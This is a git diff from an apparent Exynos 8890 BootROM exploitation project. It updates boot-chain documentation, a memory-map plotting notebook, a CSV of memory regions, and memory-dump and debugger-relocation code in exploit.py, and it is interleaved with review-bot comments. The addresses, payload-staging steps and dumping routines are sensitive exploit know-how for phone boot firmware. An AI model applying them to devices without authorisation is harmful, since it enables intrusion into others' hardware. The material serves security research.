diff --git a/documentation/exynos_exploit_chain.odg b/documentation/exynos_exploit_chain.odg index 7e31434..01205f5 100644 Binary files a/documentation/exynos_exploit_chain.odg and b/documentation/exynos_exploit_chain.odg differ diff --git a/documentation/source/BootROM_8890/boot_chain.rst b/documentation/source/BootROM_8890/boot_chain.rst index 6084f58..5920ab3 100644 --- a/documentation/source/BootROM_8890/boot_chain.rst +++ b/documentation/source/BootROM_8890/boot_chain.rst @@ -77,7 +77,7 @@ This results in the following files: After loading the stage1 (entry.S - Frederic's exploit), we're allowed to send custom payloads to the device. The first payload that is then sent, is the debugger. -debugger +Debugger -------- The initial debugger is written to ``0x2069000``, with debugger_stack and _storage at ``0x0206b000`` and ``0x0206d000`` respectively. @@ -179,7 +179,7 @@ After authentication the bootROM jumps to this function at, we can execute this jump_fwbl1() -BL1 is laoded at the download buffer and self copies to ``0x02024000`` and resumes execution there (``0x02024010``). +BL1 is loaded at the download buffer and self copies to ``0x02022000`` and resumes execution there (``0x02024010``), with a size of 0x2000 (0x02022000 to 0x02024000). However, this does not result in a jump back to the debugger. But the ROM still allows receival of one data package from the USB host (this is likely the system 'waiting' to receive the bootloader). diff --git a/documentation/source/_ignore/draw_boot.ipynb b/documentation/source/_ignore/draw_boot.ipynb index 6641930..68d8370 100644 --- a/documentation/source/_ignore/draw_boot.ipynb +++ b/documentation/source/_ignore/draw_boot.ipynb @@ -2,7 +2,7 @@ "cells": [ { "cell_type": "code", - "execution_count": 180, + "execution_count": 371, "metadata": {}, "outputs": [], "source": [ @@ -20,7 +20,7 @@ }, { "cell_type": "code", - "execution_count": 197, + "execution_count": 372, "metadata": {}, "outputs": [ { 
@@ -49,9 +49,9 @@ " name\n", " order\n", " comment\n", + " size\n", " overlap\n", " overlap_with\n", - " size\n", " \n", " \n", " \n", 
@@ -62,140 +62,166 @@ " BootROM\n", " NaN\n", " NaN\n", + " 131072\n", " True\n", " 0.0\n", - " 131072\n", " \n", " \n", " 1\n", " 704\n", - " 21184\n", - " BL1 boot entry point\n", - " ENTRY\n", + " 708\n", + " _jump_bl1\n", " NaN\n", + " NaN\n", + " 4\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 2\n", " 25824\n", - " 46304\n", - " Boot USB function\n", + " 25996\n", + " _boot_usb\n", " NaN\n", " NaN\n", + " 172\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 3\n", " 75848\n", - " 96328\n", - " bootrom authentication function\n", + " 76008\n", + " auth_bl1\n", " NaN\n", " NaN\n", + " 160\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 4\n", - " 103184\n", - " 123664\n", - " BL1 boot function\n", + " 33689440\n", + " 33689448\n", + " _boot_usb_ra\n", " NaN\n", " NaN\n", - " True\n", - " 0.0\n", - " 20480\n", + " 8\n", + " False\n", + " 4.0\n", " \n", " \n", " 5\n", - " 2146304\n", - " 2166784\n", - " Frederic Destination pointer\n", + " 33693696\n", + " 33701888\n", + " BL1\n", " NaN\n", " NaN\n", + " 8192\n", " False\n", " 5.0\n", - " 20480\n", " \n", " \n", " 6\n", - " 33689440\n", - " 33689448\n", - " Boot USB return address\n", + " 33701888\n", + " 33849344\n", + " BL31\n", " NaN\n", " NaN\n", + " 147456\n", " False\n", " 6.0\n", - " 8\n", " \n", " \n", " 7\n", - " 33691000\n", - " 33711480\n", - " Event buffer pointer\n", + " 33849344\n", + " 34008336\n", + " BL2\n", " NaN\n", " NaN\n", - " False\n", + " 158992\n", + " True\n", " 7.0\n", - " 20480\n", " \n", " \n", " 8\n", " 33984512\n", - " 34004992\n", - " First debugger location\n", + " 34009088\n", + " Debugger\n", " NaN\n", " NaN\n", + " 24576\n", " True\n", - " 9.0\n", - " 20480\n", + " 7.0\n", " \n", " \n", " 9\n", - " 33992704\n", + " 34008336\n", " 34013184\n", - " End of memory stack\n", + " End of readable memory space in buffer\n", " NaN\n", " NaN\n", + " 4848\n", " True\n", " 8.0\n", - " 20480\n", + " \n", + " \n", + " 10\n", + " 34340864\n", + " 34369536\n", + " Debugger 
relocated\n", + " NaN\n", + " NaN\n", + " 28672\n", + " True\n", + " 10.0\n", + " \n", + " \n", + " 11\n", + " 34340864\n", + " 34340868\n", + " _frederic_dest_ptr\n", + " NaN\n", + " NaN\n", + " 4\n", + " True\n", + " 10.0\n", " \n", " \n", "\n", "" ], "text/plain": [ - " start end name order comment \\\n", - "0 0 131072 BootROM NaN NaN \n", - "1 704 21184 BL1 boot entry point ENTRY NaN \n", - "2 25824 46304 Boot USB function NaN NaN \n", - "3 75848 96328 bootrom authentication function NaN NaN \n", - "4 103184 123664 BL1 boot function NaN NaN \n", - "5 2146304 2166784 Frederic Destination pointer NaN NaN \n", - "6 33689440 33689448 Boot USB return address NaN NaN \n", - "7 33691000 33711480 Event buffer pointer NaN NaN \n", - "8 33984512 34004992 First debugger location NaN NaN \n", - "9 33992704 34013184 End of memory stack NaN NaN \n", + " start end name order \\\n", + "0 0 131072 BootROM NaN \n", + "1 704 708 _jump_bl1 NaN \n", + "2 25824 25996 _boot_usb NaN \n", + "3 75848 76008 auth_bl1 NaN \n", + "4 33689440 33689448 _boot_usb_ra NaN \n", + "5 33693696 33701888 BL1 NaN \n", + "6 33701888 33849344 BL31 NaN \n", + "7 33849344 34008336 BL2 NaN \n", + "8 33984512 34009088 Debugger NaN \n", + "9 34008336 34013184 End of readable memory space in buffer NaN \n", + "10 34340864 34369536 Debugger relocated NaN \n", + "11 34340864 34340868 _frederic_dest_ptr NaN \n", "\n", - " overlap overlap_with size \n", - "0 True 0.0 131072 \n", - "1 True 0.0 20480 \n", - "2 True 0.0 20480 \n", - "3 True 0.0 20480 \n", - "4 True 0.0 20480 \n", - "5 False 5.0 20480 \n", - "6 False 6.0 8 \n", - "7 False 7.0 20480 \n", - "8 True 9.0 20480 \n", - "9 True 8.0 20480 " + " comment size overlap overlap_with \n", + "0 NaN 131072 True 0.0 \n", + "1 NaN 4 True 0.0 \n", + "2 NaN 172 True 0.0 \n", + "3 NaN 160 True 0.0 \n", + "4 NaN 8 False 4.0 \n", + "5 NaN 8192 False 5.0 \n", + "6 NaN 147456 False 6.0 \n", + "7 NaN 158992 True 7.0 \n", + "8 NaN 24576 True 7.0 \n", + "9 NaN 4848 True 8.0 
\n", + "10 NaN 28672 True 10.0 \n", + "11 NaN 4 True 10.0 " ] }, - "execution_count": 197, + "execution_count": 372, "metadata": {}, "output_type": "execute_result" } @@ -213,17 +239,22 @@ " except ValueError:\n", " return value \n", "\n", - "data.sort_values(by=['start'], inplace=True)\n", "data['start'] = data['start'].apply(convert_to_int)\n", "data['end'] = data['end'].apply(convert_to_int)\n", + "data['size'] = data['end'] - data['start']\n", + "\n", + "data.sort_values(by=['size'], inplace=True, ascending=False)\n", + "data.sort_values(by=['start'], inplace=True)\n", + "data.reset_index(drop=True, inplace=True)\n", + "\n", "data['overlap'] = False\n", "\n", "for i, row in data.iterrows():\n", " for j, row2 in data.iterrows():\n", " if i == j:\n", " continue\n", - " if row['start'] < row2['end'] and row['end'] > row2['start']:\n", - " if row['end'] - row['start'] > row2['end'] - row2['start']:\n", + " if row['start'] <= row2['end'] and row['end'] > row2['start']:\n", + " if row['end'] - row['start'] >= row2['end'] - row2['start']:\n", " continue\n", " data.at[i, 'overlap'] = True\n", " data.at[j, 'overlap'] = True\n", @@ -231,31 +262,14 @@ "\n", "data['overlap_with'] = data['overlap_with'].fillna(data.index.to_series())\n", "data['overlap_with'] = data['overlap_with'].astype(float)\n", - "data['size'] = data['end'] - data['start']\n", + "\n", + "# Send warnings if sizes are negative\n", + "if (data['size'] < 0).any():\n", + " print(f'Warning: Negative sizes detected at indices {data[data[\"size\"] < 0].index}')\n", "\n", "data" ] }, - { - "cell_type": "code", - "execution_count": 239, - "metadata": {}, - "outputs": [ - { - "data": { - "text/plain": [ - "np.int64(34013184)" - ] - }, - "execution_count": 239, - "metadata": {}, - "output_type": "execute_result" - } - ], - "source": [ - "data['end'].iloc[-1]" - ] - }, { "cell_type": "markdown", "metadata": {}, 
@@ -265,32 +279,9 @@ }, { "cell_type": "code", - "execution_count": 242, + "execution_count": 373, "metadata": {}, "outputs": [ - { - "name": "stdout", - "output_type": "stream", - "text": [ - "8.0\n", - "1.25\n", - "1.25\n", - "1.25\n", - "1.25\n", - "inf\n", - "inf\n" - ] - }, - { - "name": "stderr", - "output_type": "stream", - "text": [ - "/tmp/ipykernel_16763/1983735317.py:29: RuntimeWarning:\n", - "\n", - "divide by zero encountered in scalar divide\n", - "\n" - ] - }, { "data": { "application/vnd.plotly.v1+json": { @@ -300,7 +291,7 @@ "data": [ { "marker": { - "color": "#ce2c3c" + "color": "#856446" }, "mode": "text", "name": "BootROM", @@ -308,7 +299,7 @@ "textposition": "middle center", "type": "scatter", "x": [ - 2 + 2.5 ], "y": [ 0.5 @@ -316,15 +307,47 @@ }, { "marker": { - "color": "#ee6511" + "color": "#856446" }, "mode": "text", - "name": "BL1 boot entry point", - "text": "BL1 boot entry point", + "showlegend": false, + "text": "0x20000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.1400000000000001 + ], + "y": [ + 3.84 + ] + }, + { + "marker": { + "color": "#856446" + }, + "mode": "text", + "showlegend": false, + "text": "0x0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 0.14 + ] + }, + { + "marker": { + "color": "#82f92f" + }, + "mode": "text", + "name": "_jump_bl1", + "text": "_jump_bl1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 1.52 
@@ -332,15 +355,47 @@ }, { "marker": { - "color": "#157424" + "color": "#82f92f" }, "mode": "text", - "name": "Boot USB function", - "text": "Boot USB function", + "showlegend": false, + "text": "0x2c4", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 1.7100000000000002 + ] + }, + { + "marker": { + "color": "#82f92f" + }, + "mode": "text", + "showlegend": false, + "text": "0x2c0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 1.1600000000000001 + ] + }, + { + "marker": { + "color": "#bd73ad" + }, + "mode": "text", + "name": "_boot_usb", + "text": "_boot_usb", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 2.52 @@ -348,15 +403,47 @@ }, { "marker": { - "color": "#879ab3" + "color": "#bd73ad" }, "mode": "text", - "name": "bootrom authentication function", - "text": "bootrom authentication function", + "showlegend": false, + "text": "0x658c", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 2.71 + ] + }, + { + "marker": { + "color": "#bd73ad" + }, + "mode": "text", + "showlegend": false, + "text": "0x64e0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 2.16 + ] + }, + { + "marker": { + "color": "#7e8007" + }, + "mode": "text", + "name": "auth_bl1", + "text": "auth_bl1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 3.52 
@@ -364,31 +451,95 @@ }, { "marker": { - "color": "#a4cd2c" + "color": "#7e8007" }, "mode": "text", - "name": "BL1 boot function", - "text": "BL1 boot function", + "showlegend": false, + "text": "0x128e8", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 ], "y": [ - 4.52 + 3.71 ] }, { "marker": { - "color": "#1b44e8" + "color": "#7e8007" }, "mode": "text", - "name": "Frederic Destination pointer", - "text": "Frederic Destination pointer", + "showlegend": false, + "text": "0x12848", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 3.16 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "name": "_boot_usb_ra", + "text": "_boot_usb_ra", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 4.5 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "showlegend": false, + "text": "0x2020f68", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 4.84 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "showlegend": false, + "text": "0x2020f60", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 4.14 + ] + }, + { + "marker": { + "color": "#6f6733" + }, + "mode": "text", + "name": "BL1", + "text": "BL1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 5.5 
@@ -396,15 +547,47 @@ }, { "marker": { - "color": "#8be123" + "color": "#6f6733" }, "mode": "text", - "name": "Boot USB return address", - "text": "Boot USB return address", + "showlegend": false, + "text": "0x2024000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 5.84 + ] + }, + { + "marker": { + "color": "#6f6733" + }, + "mode": "text", + "showlegend": false, + "text": "0x2022000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 5.14 + ] + }, + { + "marker": { + "color": "#86ce48" + }, + "mode": "text", + "name": "BL31", + "text": "BL31", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 6.5 @@ -412,15 +595,47 @@ }, { "marker": { - "color": "#d82002" + "color": "#86ce48" }, "mode": "text", - "name": "Event buffer pointer", - "text": "Event buffer pointer", + "showlegend": false, + "text": "0x2048000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 6.84 + ] + }, + { + "marker": { + "color": "#86ce48" + }, + "mode": "text", + "showlegend": false, + "text": "0x2024000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 6.14 + ] + }, + { + "marker": { + "color": "#de3ae2" + }, + "mode": "text", + "name": "BL2", + "text": "BL2", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 7.5 
@@ -428,15 +643,47 @@ }, { "marker": { - "color": "#b60e34" + "color": "#de3ae2" }, "mode": "text", - "name": "First debugger location", - "text": "First debugger location", + "showlegend": false, + "text": "0x206ed10", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.1400000000000001 + ], + "y": [ + 8.34 + ] + }, + { + "marker": { + "color": "#de3ae2" + }, + "mode": "text", + "showlegend": false, + "text": "0x2048000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 7.14 + ] + }, + { + "marker": { + "color": "#292d88" + }, + "mode": "text", + "name": "Debugger", + "text": "Debugger", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 8.52 
@@ -444,19 +691,179 @@ }, { "marker": { - "color": "#4c0da0" + "color": "#292d88" }, "mode": "text", - "name": "End of memory stack", - "text": "End of memory stack", + "showlegend": false, + "text": "0x206f000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 8.709999999999999 + ] + }, + { + "marker": { + "color": "#292d88" + }, + "mode": "text", + "showlegend": false, + "text": "0x2069000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.16 + ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "name": "End of readable memory space in buffer", + "text": "End of readable memory space in buffer", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 9.52 ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "showlegend": false, + "text": "0x2070000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 9.709999999999999 + ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "showlegend": false, + "text": "0x206ed10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 9.16 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "name": "Debugger relocated", + "text": "Debugger relocated", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 10.5 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c7000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 11.84 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 10.14 + ] + }, + { + "marker": { + "color": "#3d7e32" 
+ }, + "mode": "text", + "name": "_frederic_dest_ptr", + "text": "_frederic_dest_ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 11.52 + ] + }, + { + "marker": { + "color": "#3d7e32" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0004", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.709999999999999 + ] + }, + { + "marker": { + "color": "#3d7e32" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.16 + ] } ], "layout": { @@ -478,7 +885,7 @@ }, "shapes": [ { - "fillcolor": "#ce2c3c", + "fillcolor": "#856446", "layer": "below", "line": { "width": 2 @@ -486,51 +893,12 @@ "opacity": 0.5, "type": "rect", "x0": 0.9, - "x1": 3.1, - "y0": 0.05, - "y1": 4.95 - }, - { - "fillcolor": "#ee6511", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 1.07, - "y1": 1.92 - }, - { - "fillcolor": "#157424", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 2.07, - "y1": 2.92 - }, - { - "fillcolor": "#879ab3", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 3.07, + "x1": 4.1, + "y0": 0.08, "y1": 3.92 }, { - "fillcolor": "#a4cd2c", + "fillcolor": "#82f92f", "layer": "below", "line": { "width": 2 
@@ -538,12 +906,51 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 4.069999999999999, + "x1": 4, + "y0": 1.1, + "y1": 1.79 + }, + { + "fillcolor": "#bd73ad", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 2.1, + "y1": 2.79 + }, + { + "fillcolor": "#7e8007", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 3.1, + "y1": 3.79 + }, + { + "fillcolor": "#7c5233", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 4.08, "y1": 4.92 }, { - "fillcolor": "#1b44e8", + "fillcolor": "#6f6733", "layer": "below", "line": { "width": 2 @@ -551,12 +958,12 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 5.05, - "y1": 5.95 + "x1": 4, + "y0": 5.08, + "y1": 5.92 }, { - "fillcolor": "#8be123", + "fillcolor": "#86ce48", "layer": "below", "line": { "width": 2 @@ -564,25 +971,25 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 6.05, - "y1": 6.95 + "x1": 4, + "y0": 6.08, + "y1": 6.92 }, { - "fillcolor": "#d82002", + "fillcolor": "#de3ae2", "layer": "below", "line": { "width": 2 }, "opacity": 0.5, "type": "rect", - "x0": 1, - "x1": 3, - "y0": 7.05, - "y1": 7.95 + "x0": 0.9, + "x1": 4.1, + "y0": 7.08, + "y1": 8.42 }, { - "fillcolor": "#b60e34", + "fillcolor": "#292d88", "layer": "below", "line": { "width": 2 @@ -590,12 +997,12 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 8.07, - "y1": 8.92 + "x1": 4, + "y0": 8.1, + "y1": 8.79 }, { - "fillcolor": "#4c0da0", + "fillcolor": "#5d64be", "layer": "below", "line": { "width": 2 
@@ -603,9 +1010,35 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 9.07, - "y1": 9.92 + "x1": 4, + "y0": 9.1, + "y1": 9.79 + }, + { + "fillcolor": "#1db55c", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 10.08, + "y1": 11.92 + }, + { + "fillcolor": "#3d7e32", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 11.1, + "y1": 11.79 } ], "template": { @@ -1428,7 +1861,7 @@ "xaxis": { "range": [ 0, - 4 + 5 ], "showgrid": false, "showticklabels": false, @@ -1437,7 +1870,8 @@ 1, 2, 3, - 4 + 4, + 5 ] }, "yaxis": { @@ -1446,18 +1880,6 @@ "gridwidth": 0, "showgrid": false, "showticklabels": true, - "ticktext": [ - "0x20000
0x0", - "0x52c0
0x2c0", - "0xb4e0
0x64e0", - "0x17848
0x12848", - "0x1e310
0x19310", - "0x211000
0x20c000", - "0x2020f68
0x2020f60", - "0x2026578
0x2021578", - "0x206e000
0x2069000", - "0x2070000
0x206b000" - ], "tickvals": [ 0, 1, @@ -1468,7 +1890,9 @@ 6, 7, 8, - 9 + 9, + 10, + 11 ] } } @@ -1484,8 +1908,9 @@ "\n", "tickpointers = []\n", "vertical_len = len(data['overlap_with'].unique())\n", - "vertical_gap_percentage = 0.05\n", + "vertical_gap_percentage = 0.08\n", "horizontal_gap = 0.1\n", + "labels = pd.DataFrame()\n", "\n", "def random_color():\n", " return f'#{random.randint(0, 0xFFFFFF):06x}'\n", @@ -1497,7 +1922,7 @@ " data.at[i, 'fillcolor'] = fillcolor\n", " \n", " x0=1\n", - " x1=3\n", + " x1=4\n", "\n", " if d['overlap'] == False:\n", " y0=d['overlap_with']\n", @@ -1507,18 +1932,18 @@ "\n", " # Calculate relative size of the overlap\n", " overlap_sizes = data.loc[data['overlap_with'] == d['overlap_with']].iloc[1:]['size'].sum()\n", - " print((d['size']/overlap_sizes)*overlaps)\n", "\n", - " if d['overlap'] == i+1:\n", + " if d['overlap_with'] == i:\n", " y0=i\n", " y1=overlaps+i\n", - " if y1 == vertical_len:\n", - " y1 = vertical_len + vertical_gap_percentage\n", + " if i != data.shape[0]+1:\n", + " if d['end'] > data.iloc[i+1].start and d['end'] < data.iloc[i+1].end:\n", + " y1=overlaps+i-0.5\n", " x0=x0-horizontal_gap\n", " x1=x1+horizontal_gap\n", " else:\n", " y0=0.02+i\n", - " y1=0.97+i\n", + " y1=0.87+i\n", " else:\n", " print(f'Something went wrong with {d}. Skipping')\n", " continue\n", @@ -1527,14 +1952,15 @@ " type=\"rect\",\n", " x0=x0,\n", " x1=x1,\n", - " y0=y0+gap_percentage,\n", - " y1=y1-gap_percentage,\n", + " y0=y0+vertical_gap_percentage,\n", + " y1=y1-vertical_gap_percentage,\n", " line=dict(width=2),\n", " fillcolor=fillcolor,\n", " opacity=0.5,\n", " layer=\"below\",\n", " )\n", "\n", + " # Add middle text\n", " fig.add_trace(go.Scatter\n", " (\n", " x=[(x0+x1)/2],\n", 
@@ -1548,21 +1974,58 @@ " ),\n", " ))\n", "\n", + " # Add top-left text with d['end']\n", + " fig.add_trace(go.Scatter\n", + " (\n", + " x=[(x0+0.14+horizontal_gap)],\n", + " y=[y1-0.16],\n", + " text=hex(d['end']),\n", + " mode=\"text\",\n", + " textposition=\"middle center\",\n", + " marker=dict(\n", + " color=fillcolor,\n", + " ),\n", + " showlegend=False,\n", + " ))\n", + "\n", + " # Add bottom-left text with d['end']\n", + " fig.add_trace(go.Scatter\n", + " (\n", + " x=[(x0+0.14+horizontal_gap)],\n", + " y=[y0+0.14],\n", + " text=hex(d['start']),\n", + " mode=\"text\",\n", + " textposition=\"middle center\",\n", + " marker=dict(\n", + " color=fillcolor,\n", + " ),\n", + " showlegend=False,\n", + " ))\n", + "\n", "fig.update_xaxes(\n", - " range=[0, 4],\n", - " tickvals=[0, 1, 2, 3, 4],\n", + " range=[0, 5],\n", + " tickvals=[0, 1, 2, 3, 4, 5],\n", ")\n", "\n", + "start_values = data['start'].sort_values()\n", + "end_values = data['end'].sort_values()\n", + "\n", "labels = []\n", - "for i, j in zip(data['start'], data['end']):\n", - " labels.append(f'{hex(j)}
{hex(i)}')\n", + "\n", + "for i, d in data.iterrows():\n", + " if i == 0:\n", + " labels.append(f'{hex(start_values.iloc[i])}')\n", + " elif i == len(data)-1:\n", + " labels.append(f'{hex(end_values.iloc[i])}')\n", + " else:\n", + " labels.append(f'{hex(start_values.iloc[i])}
{hex(end_values.iloc[i-1])}')\n", "\n", "tickpointers = [i for i in range(len(data))]\n", "\n", "fig.update_yaxes(\n", " # tickvals=[i for i in range(len(data)+1)], \n", " tickvals = tickpointers,\n", - " ticktext= labels,\n", + " # ticktext= labels,\n", " griddash=\"longdashdot\",\n", " gridwidth=0,\n", " gridcolor=\"black\",\n", diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv index 475e541..eee5c5d 100644 --- a/documentation/source/_ignore/stack_and_functions.csv +++ b/documentation/source/_ignore/stack_and_functions.csv @@ -1,11 +1,13 @@ start,end,name,order,comment -0,131072,BootROM,, -704,21184,BL1 boot entry point,ENTRY, -25824,46304,Boot USB function,, -75848,96328,bootrom authentication function,, -103184,123664,BL1 boot function,, -2146304,2166784,Frederic Destination pointer,, -33689440,33689448,Boot USB return address,, -33691000,33711480,Event buffer pointer,, -33984512,34004992,First debugger location,, -33992704,34013184,End of memory stack,, +0x00000000,0x00020000,BootROM,, +0x02020f60,0x02020f68,_boot_usb_ra,, +0x00012848,0x000128e8,auth_bl1,, +0x000064e0,0x0000658c,_boot_usb,, +0x020c0000,0x020c0004,_frederic_dest_ptr,, +0x000002c0,0x000002c4,_jump_bl1,, +0x02022000,0x02024000,BL1,, +0x02024000,0x02048000,BL31,, +0x02048000,0x0206ed10,BL2,, +0x02069000,0x0206f000,Debugger,, +0x020c0000,0x020c7000,Debugger relocated,, +0x0206ed10,0x02070000,End of readable memory space in buffer,, \ No newline at end of file diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 62c17b1..9efc2d9 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py 
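Review bot: The comment `# Add bottom-left text with d['end']` on the second added trace is wrong, since that trace renders `hex(d['start'])`; it should read `# Add bottom-left text with d['start']`. The `start_values`/`end_values`/`labels` block that follows is dead code now that `ticktext= labels` is commented out in `update_yaxes`, and `labels` is first bound to `pd.DataFrame()` in an earlier hunk and then rebound to a list here; either delete the block or keep the tick labels wired up. The two new traces also repeat the middle-text trace almost line for line, so a small helper taking `(x, y, text, fillcolor)` would shorten the cell considerably.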
@@ -306,25 +306,20 @@ class ExynosDevice(): count += 1 - def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False): + def dump_memory(self, start: hex=0x0, end: hex=0x02070000, write=False): """ Dumps memory from the device. Transfer XFER_BUFFER at 0x02021800, to: 0x02020F08. End of memory at 0x0206ffff. """ - # NOT WORKING YET - transferred = ctypes.c_int() dumped = b"" # Read data from memory - for block in tqdm.tqdm(range(start, end, 0x200)): - self.usb_write(p32(block-0x200)) - res = self.usb_read(0x200) - dumped += res - - if write: - filename = f"dump_{hex(start)}_{hex(end)}_{self.target}_{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.bin" - with open(filename, "wb") as f: - f.write(dumped) + try: + for block in tqdm.tqdm(range(start, end, 0x6000)): + dump = self.cd.memdump_region(block, 0x6000) + dumped += dump + except: + print("Error reading memory, at block: ", hex(block)) return dumped @@ -402,26 +397,6 @@ class ExynosDevice(): assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000) - def relocate_debugger_3(self): - """ - Relocate debugger to 0x0201a000, 0x0201c000, 0x0201a000 - """ - if os.getenv("USER") == "eljakim": - debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger_0x0201a000.bin", "rb").read() - else: - try: - debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read() - except Exception as e: - print(f'Are you missing your debugger? Please ensure it is present in dump/debugger_0x0201a000.bin. {e}') - sys.exit(0) - - self.cd.memwrite_region(0x020c0000, debugger_reloc) - # self.usb_write(b"FLSH") # Flush cache - self.cd.restore_stack_and_jump(0x020c0000) - assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" - self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000) - - def dumb_interact(self, dump_imems=False): ''' Room for playing around with the debugger on the phone. 
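Review bot: The `except:` around the new dump loop in `dump_memory` is bare, so it also swallows `KeyboardInterrupt`, and if `tqdm.tqdm(range(...))` raises before the first iteration the handler's `hex(block)` fails with `UnboundLocalError`; narrow it to `except Exception as e:`, include `e` in the message, and set `block = start` before the `try`. The loop also requests a fixed 0x6000 bytes per step, so whenever `end - start` is not a multiple of 0x6000 the final read extends past `end`; clamp it with `self.cd.memdump_region(block, min(0x6000, end - block))`. The `write` parameter is now unused because the file-writing branch was removed, the docstring still says `End of memory at 0x0206ffff` while the default changed to `0x02070000`, and `start: hex` / `end: hex` annotate with the builtin function rather than a type — `int` is meant.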
